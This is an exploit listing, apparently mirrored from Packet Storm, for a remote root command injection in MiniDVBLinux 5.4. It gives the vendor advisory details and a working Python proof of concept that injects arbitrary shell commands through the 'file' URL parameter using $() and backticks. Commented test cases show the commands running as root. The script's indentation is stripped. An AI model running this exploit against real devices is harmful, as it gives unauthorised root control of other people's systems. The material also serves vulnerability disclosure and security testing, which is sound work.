Exploit for MiniDVBLinux 5.4 Remote Root Command Injection

Name: Exploit for MiniDVBLinux 5.4 Remote Root Command Injection
Rating: 5 (145 reviews)
2022-10-17 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:168744
#!/usr/bin/env python3  
#  
#  
# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability  
#  
#  
# Vendor: MiniDVBLinux  
# Product web page: https://www.minidvblinux.de  
# Affected version: <=5.4  
#  
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple  
# way to convert a standard PC into a Multi Media Centre based on the  
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this  
# Linux based Digital Video Recorder: Watch TV, Timer controlled  
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration  
# via browser, and a lot more. MLD strives to be as small as possible,  
# modular, simple. It supports numerous hardware platforms, like classic  
# desktops in 32/64bit and also various low power ARM systems.  
#  
# Desc: The application suffers from an OS command injection vulnerability.  
# This can be exploited to execute arbitrary commands with root privileges.  
#  
# Tested on: MiniDVBLinux 5.4  
# BusyBox v1.25.1  
# Architecture: armhf, armhf-rpi2  
# GNU/Linux 4.19.127.203 (armv7l)  
# VideoDiskRecorder 2.4.6  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2022-5717  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php  
#  
#  
# 24.09.2022  
#  
  
import requests  
import re,sys  
  
#test case 001  
#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT  
#test case 004  
#http://ip:8008/?site=about&name=blind&file=$(id)  
#cat: can't open 'uid=0(root)': No such file or directory  
#cat: can't open 'gid=0(root)': No such file or directory  
#test case 005  
#http://ip:8008/?site=about&name=blind&file=`id`  
#cat: can't open 'uid=0(root)': No such file or directory  
#cat: can't open 'gid=0(root)': No such file or directory  
  
if len(sys.argv) < 3:  
print('MiniDVBLinux 5.4 Command Injection PoC')  
print('Usage: ./mldhd_root2.py [url] [cmd]')  
sys.exit(17)  
else:  
url = sys.argv[1]  
cmd = sys.argv[2]  
  
req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')  
outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()  
print(outz.replace('<pre>','').replace('</pre>',''))